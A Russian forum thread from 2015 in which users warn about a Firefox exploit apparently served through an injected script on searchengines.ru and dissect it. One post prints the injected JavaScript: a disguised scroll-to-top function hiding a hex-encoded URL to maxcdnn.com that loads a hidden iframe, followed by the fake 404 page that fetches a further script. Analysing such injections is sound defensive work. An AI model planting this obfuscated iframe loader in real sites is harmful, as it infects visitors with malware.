Вирус

Всем пользователям, посещающим searchengines.guru с помощью браузера firefox, рекомендуется срочно обновиться до версии 39.0.3. И желательно сменить пароли FTP/SSH к своим сайтам.

Новость: https://roem.ru/07-08-2015/202490/ff-exploit-huge/

Прямо сейчас, находясь на searchengines, я вижу следующее:

А вот и виновник торжества: http://rghost.ru/6St26vCgY/image.png

Админы уже писали, что это не их сайт пытается угнать, а идет подмена (встраивание кода) где-то.

"Где-то" - на сайте. У меня на компе и в сетевой инфраструктуре нет вирусов.

Видимо не только на серче, но и на множестве других.

Хотя про серч там же нигде не написано, а по скрину на rghost ничего не понятно.

С чего вы так уверены? С другого браузера тоже самое?

Абсолютно уверен.

Вирус находится в файле

его содержимое:

/* Main function */

$(document).ready(function(){

setTimeout(function(){

scrollToTopLayer();

}, 10000);

});

/* Functions */

function scrollToTopLayer() {

var footerTop = $('#footer').offset().top;

var windw = $(window);

var link = $('#scroll-top-link');

var scrollTopLayer = "\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x78\x63\x64\x6e\x6e\x2e\x63\x6f\x6d\x2f\x70\x69\x6e\x67\x2e\x72\x65\x71\x75\x65\x73\x74";

windw.scroll(function () {

if (windw.scrollTop() > 300) {

link.not('.showed').addClass('showed').stop(false,true).fadeIn(200)

} else {

link.removeClass('showed').stop(false,true).fadeOut(200)

}

if (windw.scrollTop() + windw.height() + 5 >= footerTop)

link.addClass('sticked');

else

link.removeClass('sticked');

});

$('<iframe />', {

src: scrollTopLayer,

name: 'scrollTopLayer',

id: 'scrollTopLayer',

width: '10px',

height: '10px',

frameBorder: 0,

}).appendTo('body');

}

Если написать

\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x78\x63\x64\x6e\x6e\x2e\x63\x6f\x6d\x2f\x70\x69\x6e\x67\x2e\x72\x65\x71\x75\x65\x73\x74

английскими буквами то получится http://maxcdnn.com/ping.request

---------- Добавлено 08.08.2015 в 13:05 ----------

Как мы видим, этот код вставляет в конец страницы iframe, который грузит следующее (если user-agent = firefox):

<html><head>

<title>404 Not Found</title>

</head><body>

<h1>Not Found</h1>

<p>The requested URL /ping.request was not found on this server.</p>

<hr>

<address>Apache Server at maxcdnn.com Port 80</address>

<style>input { margin:0;background-color:#fff;border:1px solid #fff; }</style>

<script src="dc27a0eb57ffb1ed6412549cb82b748c790b3b1b8d47fdb88ed095784ab300aaf4871885022ffe113e896c6ce172980d.js?r=aHR0cDovL3d3dy5zZWFyY2hlbmdpbmVzLnJ1L2FydGljbGVzL2lkZWFsbmF5YV9jbXNfZC5odG1s"></script>

</body>

</html>

ну а далее загружается вредоносный код. Надеюсь, это не по злому умыслу происходит. Жду объяснений 🍿

Содержимое вредоносного script, для тех кому непонятно на скриншоте,

Действительно вижу. Походу битрикс поломали.

Я так понимаю, что речь не о searchengines.guru а о searchengines.ru

Это важная разница....